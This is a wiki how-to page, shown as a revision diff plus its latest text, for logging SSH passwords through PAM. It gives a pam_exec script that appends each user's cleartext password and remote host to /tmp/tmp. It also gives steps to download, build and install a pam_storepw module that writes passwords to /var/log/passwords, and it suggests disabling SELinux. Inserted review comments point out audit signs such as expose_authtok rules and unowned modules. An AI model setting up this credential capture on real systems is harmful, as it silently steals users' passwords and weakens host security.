Sshd: Difference between revisions
(7 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
=save password= | =sshd save password= | ||
==pam_exec.so== | |||
/etc/pam.d/password-auth-ac | |||
#%PAM-1.0 | |||
# This file is auto-generated. | |||
# User changes will be destroyed the next time authconfig is run. | |||
auth required pam_env.so | |||
auth sufficient pam_unix.so nullok try_first_pass | |||
auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so | |||
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata | |||
... | |||
/usr/local/bin/pam_exec.so | |||
#!/bin/sh | |||
read password | |||
echo "User: $PAM_USER" >> /tmp/tmp | |||
echo "Ruser: $PAM_RUSER" >> /tmp/tmp | |||
echo "Rhost: $PAM_RHOST" >> /tmp/tmp | |||
echo "Service: $PAM_SERVICE" >> /tmp/tmp | |||
echo "TTY: $PAM_TTY" >> /tmp/tmp | |||
echo "Password : $password" >> /tmp/tmp | |||
exit $? | |||
==pam_storepw.so== | |||
Download source code for module. | Download source code for module. | ||
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c | curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c | ||
Create the following Makefile | Create the following Makefile | ||
all: pam_storepw.so | |||
all: pam_storepw.so | pam_storepw.so: pam_storepw.o | ||
$(LD) --shared -o $@ $< -lpam -lpam_misc | |||
pam_storepw.so: pam_storepw.o | |||
clean: | |||
rm -f pam_storepw.o pam_storepw.so core *~ | |||
clean: | |||
extraclean: clean | |||
rm -f *.a *.o *.so *.bak | |||
.c.o: | |||
$(CC) $(CFLAGS) -c $< -o $@ -fPIC | |||
Build file | Build file | ||
make | make | ||
Copy file | Copy file | ||
cp pam_storepw.so /lib64/security/ | cp pam_storepw.so /lib64/security/ | ||
chmod 755 /lib64/security/pam_storepw.so | chmod 755 /lib64/security/pam_storepw.so | ||
auth | password-auth-ac | ||
#%PAM-1.0 | |||
# This file is auto-generated. | |||
# User changes will be destroyed the next time authconfig is run. | |||
auth required pam_env.so | |||
auth sufficient pam_unix.so nullok try_first_pass | |||
auth optional pam_storepw.so | |||
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata | |||
... | |||
Passwords start to be written to | Passwords start to be written to | ||
/var/log/passwords | /var/log/passwords |
Latest revision as of 07:46, 7 November 2018
sshd save password
pam_exec.so
/etc/pam.d/password-auth-ac
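#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
#
# NOTE(review): the listing was collapsed onto one line; PAM reads one rule per
# line, so the line breaks are restored here.
# The pam_exec.so rule below runs /usr/local/bin/pam_exec.so, which on this page
# is a shell script despite its .so name. expose_authtok makes pam_exec hand the
# submitted password to that program on stdin, so the helper sees it in
# cleartext. When auditing a host, any pam_exec rule carrying expose_authtok in
# an auth stack, and the program it names, deserves a line-by-line review.
auth required pam_env.so
auth sufficient pam_unix.so nullok try_first_pass
auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...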
/usr/local/bin/pam_exec.so
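#!/bin/sh
# Helper invoked by pam_exec with expose_authtok: it reads one line (the
# submitted password) from stdin and appends it, together with the PAM_*
# variables found in its environment, to /tmp/tmp.
#
# NOTE(review): the listing was collapsed onto the shebang line, which would turn
# the whole script into a comment; one command per line is restored here.
# NOTE(review): /tmp/tmp is a fixed name in a world-writable directory, and the
# file's mode follows the umask of whichever process creates it. With a common
# 022 umask every local account can read the recorded passwords, so any
# credential that has passed through this script should be treated as exposed
# and rotated, and the file removed once the test is over.

# One line from stdin; with expose_authtok this is the password being checked.
read password

# Context of the authentication attempt, taken from the environment.
echo "User: $PAM_USER" >> /tmp/tmp
echo "Ruser: $PAM_RUSER" >> /tmp/tmp
echo "Rhost: $PAM_RHOST" >> /tmp/tmp
echo "Service: $PAM_SERVICE" >> /tmp/tmp
echo "TTY: $PAM_TTY" >> /tmp/tmp

# The cleartext password itself.
echo "Password : $password" >> /tmp/tmp

# Propagate the status of the last echo back to pam_exec.
exit $?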
pam_storepw.so
Download source code for module.
# NOTE(review): this is a plain-HTTP download, so the source arrives with no
# integrity or origin check (-k only relaxes TLS certificate validation and has
# no effect on an http:// URL). The file is compiled into a PAM module that is
# loaded inside the authentication path, so read the source before building it
# and compare it with a checksum if the author publishes one.
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c
Create the following Makefile
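# Builds the shared object pam_storepw.so from pam_storepw.c.
#
# NOTE(review): the listing was collapsed onto one line; rules and their
# TAB-indented recipes are restored here.
# NOTE(review): the compile rule needs a file named pam_storepw.c, while the
# download step on this page saves chng-pam_storepw.c. The page shows no rename
# step, so presumably the file has to be renamed first; confirm.

# None of these names is a file produced by the build.
.PHONY: all clean extraclean

all: pam_storepw.so

# Link the position-independent object into a shared library.
pam_storepw.so: pam_storepw.o
	$(LD) --shared -o $@ $< -lpam -lpam_misc

clean:
	rm -f pam_storepw.o pam_storepw.so core *~

# Broad globs: removes every archive, object, shared object and .bak file in
# the current directory, not only the ones this Makefile built.
extraclean: clean
	rm -f *.a *.o *.so *.bak

# Suffix rule: compile any .c into a .o as position-independent code.
.c.o:
	$(CC) $(CFLAGS) -c $< -o $@ -fPIC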
Build file
# Runs the Makefile's default goal (all), which builds pam_storepw.so.
make
Copy file
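# Install the built module into the PAM module directory and make it readable
# and executable by everyone, writable only by its owner.
#
# NOTE(review): the two commands were collapsed onto one line, which would make
# cp treat "chmod", "755" and the second path as extra arguments; they are
# separated again here.
# NOTE(review): a module copied in by hand is not owned by any package. On an
# RPM-based host, `rpm -qf` run against each file under /lib64/security reports
# such files as not owned, which makes this a straightforward item to include
# in a host audit.
cp pam_storepw.so /lib64/security/
chmod 755 /lib64/security/pam_storepw.so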
password-auth-ac
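#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
#
# NOTE(review): the listing was collapsed onto one line; PAM reads one rule per
# line, so the line breaks are restored here.
# pam_storepw.so is the locally built module from this page, not one shipped
# with the PAM package. According to the page it writes passwords to
# /var/log/passwords, so that file holds credentials and needs root-only
# ownership and mode. An auth rule that names a module with no owning package
# is worth flagging when reviewing /etc/pam.d.
auth required pam_env.so
auth sufficient pam_unix.so nullok try_first_pass
auth optional pam_storepw.so
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...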
Passwords start to be written to
/var/log/passwords
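If you do not get any entries, temporarily turn SELinux off to see whether it starts to work, and run PAM in debug mode to see what is going on. A write that SELinux blocks is recorded as an AVC denial in the audit log, so look there first; the denial confirms the cause without changing the enforcement mode.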